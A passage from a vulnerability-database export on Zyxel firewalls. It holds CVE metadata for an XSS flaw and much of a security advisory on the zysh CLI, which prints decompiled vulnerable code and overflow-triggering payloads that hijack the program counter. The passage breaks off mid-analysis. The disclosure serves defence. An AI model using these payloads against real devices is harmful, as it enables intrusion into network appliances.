                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.70",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg20_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.70",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg20:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg210_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.70",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg210:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg2200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.70",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg2200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.70",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg310_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.70",
                        "versionStartIncluding": "4.35",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg310:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-0734"
          }
        ]
      },
      "cve": "CVE-2022-0734",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": true,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULMON",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2022-0734",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "MEDIUM",
                "trust": 0.1,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 2.8,
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "security@zyxel.com.tw",
                "availabilityImpact": "NONE",
                "baseScore": 5.8,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 3.9,
                "impactScore": 1.4,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2022-0734",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "security@zyxel.com.tw",
                "id": "CVE-2022-0734",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202205-3997",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2022-0734",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-0734"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-0734"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-0734"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3997"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A cross-site scripting vulnerability was identified in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.35 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.35 through 5.20, and VPN series firmware versions 4.35 through 5.20, that could allow an attacker to obtain some information stored in the user\u0027s browser, such as cookies or session tokens, via a malicious script",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-0734"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-0734"
          }
        ],
        "trust": 0.99
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-0734",
            "trust": 1.7
          },
          {
            "db": "CS-HELP",
            "id": "SB2022052406",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3997",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-0734",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-0734"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-0734"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3997"
          }
        ]
      },
      "id": "VAR-202205-1788",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.35069445
      },
      "last_update_date": "2023-12-18T13:22:23.028000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Zyxel USG/ZyWALL Fixes for cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=193848"
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3997"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-0734"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://www.zyxel.com/support/multiple-vulnerabilities-of-firewalls-ap-controllers-and-aps.shtml"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2022052406"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2022-0734/"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/79.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-0734"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-0734"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3997"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2022-0734"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-0734"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3997"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-05-24T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-0734"
          },
          {
            "date": "2022-05-24T03:15:09.093000",
            "db": "NVD",
            "id": "CVE-2022-0734"
          },
          {
            "date": "2022-05-24T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202205-3997"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-06-06T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-0734"
          },
          {
            "date": "2022-06-06T18:16:13.957000",
            "db": "NVD",
            "id": "CVE-2022-0734"
          },
          {
            "date": "2022-06-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202205-3997"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3997"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Zyxel USG/ZyWALL Cross-site scripting vulnerability",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3997"
          }
        ],
        "trust": 0.6
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3997"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202205-1789

    Vulnerability from variot - Updated: 2023-12-18 13:22

    A argument injection vulnerability in the 'packet-trace' CLI command of Zyxel USG/ZyWALL series firmware versions 4.09 through 4.71, USG FLEX series firmware versions 4.50 through 5.21, ATP series firmware versions 4.32 through 5.21, VPN series firmware versions 4.30 through 5.21, NSG series firmware versions 1.00 through 1.33 Patch 4, NXC2500 firmware version 6.10(AAIG.3) and earlier versions, NAP203 firmware version 6.25(ABFA.7) and earlier versions, NWA50AX firmware version 6.25(ABYW.5) and earlier versions, WAC500 firmware version 6.30(ABVS.2) and earlier versions, and WAX510D firmware version 6.30(ABTF.2) and earlier versions, that could allow a local authenticated attacker to execute arbitrary OS commands by including crafted arguments to the CLI command. --[ HNS-2022-02 - HN Security Advisory - https://security.humanativaspa.it/

    • Title: Multiple vulnerabilities in Zyxel zysh
    • Products: Zyxel firewalls, AP controllers, and APs
    • Author: Marco Ivaldi marco.ivaldi@hnsecurity.it
    • Date: 2022-06-07
    • CVE Names and Vendor CVSS Scores: CVE-2022-26531: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H (6.1) CVE-2022-26532: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (7.8)
    • Advisory URLs: https://github.com/hnsecurity/vulns/blob/main/HNS-2022-02-zyxel-zysh.txt https://www.zyxel.com/support/multiple-vulnerabilities-of-firewalls-AP-controllers-and-APs.shtml

    --[ 0 - Table of contents

    1 - Summary 2 - Background 3 - Vulnerabilities 4 - Analysis 4.1 - Buffer overflows in the "configure terminal > diagnostic" command 4.2 - Buffer overflow in the "debug" command 4.3 - Buffer overflow in the "ssh" command 4.4 - Format string bugs in the "extension" argument of some commands 4.5 - OS command injection in the "packet-trace" command 5 - Exploitation 5.1 - Buffer overflows 5.2 - Format string bugs 5.3 - OS command injection 6 - Affected products 7 - Remediation 8 - Disclosure timeline 9 - References

    --[ 1 - Summary

    "We live on a placid island of ignorance in the midst of black seas of infinity, and it was not meant that we should voyage far." -- H. P. Lovecraft, The Call of Cthulhu

    We have identified multiple security vulnerabilities in the zysh binary that implements the command-line interface (CLI) on a wide range of Zyxel products, including their security appliances such as those in the Unified Security Gateway (USG) product line:

    • Multiple stack-based buffer overflows in the code responsible for handling diagnostic tests ("configure terminal > diagnostic" command).
    • A stack-based buffer overflow in the "debug" command.
    • A stack-based buffer overflow in the "ssh" command.
    • Multiple format string bugs in the "extension" argument of the "ping", "ping6", "traceroute", "traceroute6", "nslookup", and "nslookup6" commands.
    • An OS command injection vulnerability in the "packet-trace" command.

    We demonstrated the possibility to exploit the format string bugs and the OS command injection vulnerability to escape the restricted shell environment and achieve arbitrary command execution on the underlying embedded Linux OS, respectively as regular user and as root.

    --[ 2 - Background

    The zysh binary is a restricted shell that implements the command-line interface (CLI) on multiple Zyxel [0] products. All regular user accounts have an /etc/passwd entry similar to the following:

    admin:x:10007:10000:Administration account...:/etc/zyxel/ftp:/bin/zysh

    Only the root user and the reserved debug account, disabled by default, have access to a proper bash shell:

    root:x:0:0:root&admin&120&120&480&480&1&0:/root:/bin/bash ... debug:!:0:0:Debug Account:/root:/bin/bash

    The Zyxel CLI can be accessed via SSH as follows:

    raptor@blumenkraft ~ % ssh -l admin (admin@) Password: Router> # hello zysh!

    On our Zyxel USG20-VPN test device, the CLI can also be accessed via Telnet (not enabled by default) or via the so-called Web Console, implemented with WebSockets, that is reachable with a web browser after authentication, at a URL such as the following:

    https:///webconsole/

    In the context of a wider audit of the security posture of Zyxel devices [1], we decided to audit zysh with the primary goal of escaping the restricted shell environment and executing arbitrary commands on the underlying embedded Linux OS. It is pretty large for a dynamically-linked, stripped binary (~19MB) and it makes plenty of unsafe API function calls, which makes it an interesting target.

    --[ 3 - Vulnerabilities

    During our audit of the zysh binary, we identified the following vulnerabilities:

    • Multiple stack-based buffer overflows in the code responsible for handling diagnostic tests ("configure terminal > diagnostic" command).
    • A stack-based buffer overflow in the "debug" command.
    • A stack-based buffer overflow in the "ssh" command.
    • Multiple format string bugs in the "extension" argument of the "ping", "ping6", "traceroute", "traceroute6", "nslookup", and "nslookup6" commands.
    • An OS command injection vulnerability in the "packet-trace" command.

    All buffer overflows can be triggered only by admin users, while the format string bugs and the command injection vulnerability are exploitable by authenticated users of either admin or limited-admin type.

    --[ 4 - Analysis

    To follow along with our detailed vulnerability analysis, you can download the Zyxel Firmware 5.10 for "USG20-VPN - ABAQ - Non-Wireless Edition" (USG20-VPN_5.10.zip [2]). Extract the ZIP archive, then extract the password-protected ZIP archive 510ABAQ0C0.bin contained within, using the following password [1]:

    4ulPPIs94jnYwUfwwoTqz/a5eRHFRwNYq8zFTrQZaE7XkoTgdzWc.6jea1v1zJb

    Finally, extract the Squashfs filesystem image with binwalk or a similar tool, e.g.:

    raptor@blumenkraft 510ABAQ0C0 % binwalk -e compress.img

    The target binary we will reference throughout our analysys is /bin/zysh, available in the extracted filesystem:

    raptor@blumenkraft bin % ls -l zysh -rwxr-xr-x 1 raptor staff 19727292 Sep 23 18:33 zysh* raptor@blumenkraft bin % shasum -a 256 zysh 47ee711a817e33bb2809e91d76b512498ae3cdca1276a2385f404384547404e3 zysh raptor@blumenkraft bin % file zysh zysh: ELF 32-bit MSB executable, MIPS, N32 MIPS64 rel2 version 1 (SYSV), dynamically linked, interpreter /lib32/ld.so.1, for GNU/Linux 2.6.9, stripped

    You can easily import it in your favorite disassembler. In Ghidra, we had to manually tweak the import options to reflect that the binary was compiled for the N32 ABI [3], importing it as "MIPS:BE:64:64-32addr:n32". The same requirement holds for any other binaries compiled for the Cavium Octeon III processor, on which our Zyxel USG20-VPN test device is based.

    --[ 4.1 - Buffer overflows in the "configure terminal > diagnostic" command

    The first buffer overflow vulnerability we identified is located in the function at 0x1013b238, which we dubbed do_emtap():

    undefined8 do_emtap(longlong argc, char argv) { ... char acStack305[129]; ... else { uVar1 = 1; if (argc == 3) { sprintf(acStack305 + 1, "t%s.sh", argv[2]); / VULN #1 / pcVar4 = argv[1]; do_emtap_test(pcVar4, acStack305 + 1); do_emtap_test2(pcVar4, acStack305 + 1); report_test(); uVar1 = 0; } } return uVar1; }

    This function is called when an admin user invokes the diagnostic test functionality in the Zyxel CLI with two arguments, e.g.:

    Router> configure terminal Router(config)# diagnostic test

    The buffer overflow happens due to the unsafe sprintf() call marked with the "VULN #1" comment above, which overflows past the boundary of the acStack305 array allocated on the stack with the contents of the argument.

    Upon exploitation, however, the return statement at 0x1013b2f4 is never reached, because the overflow propagates to the other functions that are called by do_emtap(), which we dubbed do_emtap_test() and do_emtap_test2() in the pseudo-code above. More precisely, another overflow happens at the sprintf() call below marked as "VULN #2", located in the do_emtap_test() function at 0x1013a8f8. This overflow enables us to gain control over the pc register when do_emtap_test() returns:

    int do_emtap_test(char test_name, char test_num) { ... char acStack320[128]; char acStack192[128]; ... sprintf(acStack320, "%s/%s", "/tmp/tap", test_name); / VULN #3 / mkdir(acStack320, 0x1c0); sprintf(acStack192, "%s/%s/%s", "/usr/local/emtap/test_script", test_name, test_num); / VULN #2 / iVar1 = access(acStack192, 0); if (iVar1 != 0) { return 1; } ... }

    The unsafe sprintf() call overflows past the boundary of the acStack192 array. When do_emtap_test() returns, we are able hijack the control flow. However, we can only use numeric characters in our hostile buffer, therefore exploitation is extremely unlikely, if at all possible. The overflow can be triggered with the following payload:

    Router> configure terminal Router(config)# diagnostic test anything 1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 Program received signal SIGBUS, Bus error. 0x31313130 in ?? ()

    A slightly better opportunity for exploitation is represented by another stack-based buffer overflow in the above function, marked with the "VULN

    3" comment. This specific overflow can be triggered with the following

    payload:

    Router> configure terminal Router(config)# diagnostic test AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 1 Program received signal SIGBUS, Bus error. 0x41414140 in ?? ()

    This time, our hostile buffer can contain alphanumeric characters in the range [a-zA-Z0-9], plus the underscore '_'. Still far from ideal, but definitely better than the previously identified exploitation vector.

    A similar vector is provided by yet another stack-based buffer overflow, this time in the function located at 0x1013ada0, which we dubbed do_emtap_test3():

    undefined8 do_emtap_test3(char test_name) { ... char acStack288[127]; ... sprintf(acStack288, "%s %s/%s | %s -E \'t[0-9]+\.sh\' > %s", "/bin/ls", "/usr/local/emtap/test_script", test_name, "/bin/grep", "/tmp/tap/test_case_dir.tmp"); / VULN #4 */ system(acStack288); ... sprintf(acStack288, "%s %s", "/bin/rm", "/tmp/tap/test_case_dir.tmp"); system(acStack288); return 0; } ... }

    This function is called when an admin user invokes the diagnostic test functionality in the Zyxel CLI with only one argument, e.g.:

    Router> configure terminal Router(config)# diagnostic test

    This time, the unsafe sprintf() call marked with the "VULN #4" comment overflows past the boundary of the acStack288 array. By exploiting this overflow, we can once again overwrite the pc register and hijack the control flow. In order to trigger this overflow, the following payload can be used:

    Router> configure terminal Router(config)# diagnostic test AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /bin/ls: cannot access /usr/local/emtap/test_script/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: No such file or directory Program received signal SIGBUS, Bus error. 0x41414140 in ?? ()

    In the mentioned functions, including the one located at 0x1013aa10 that we dubbed do_emtap_test2() and that is not immediately reachable via the codepaths triggered by our hostile inputs, there are other instances of buffer overflow caused by the unchecked use of unsafe API functions, such as sprintf() and strcpy(). We have not deeply investigated their actual reachability, but they should be fixed as well. In addition, many unsafe programming constructs are present in the rest of the binary.

    --[ 4.2 - Buffer overflow in the "debug" command

    The buffer overflow vulnerability we identified in the code responsible for handling the "debug" command is located in the function at 0x1000df70, which we dubbed do_debug().

    It is a pretty long function that gets called when an admin (or in some cases a limited-admin) user invokes the debug functionality in the Zyxel CLI, e.g.:

    Router> debug

    To trigger the overflow, the following payload can be used:

    Router> debug gui webhelp redirect AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Router> debug gui show webhelp redirect Program received signal SIGBUS, Bus error. 0x41414140 in ?? ()

    The first command writes a long string in the /tmp/webhelppath file:

    int do_debug(ulonglong argc, char argv) { ... case 0x155: if (DAT_1145e55c != 0x150) { return 0; } pcVar11 = "/tmp/webhelppath"; if (DAT_1145e564 != 0x154) { return 0; } LAB_1000ebdc: pFVar12 = fopen64(pcVar11, "w"); / open file / ... fputs(argv[4], pFVar12); / write string to file / fclose(pFVar12); return 0; }

    The second command triggers the overflow by reading from the /tmp/webhelppath file:

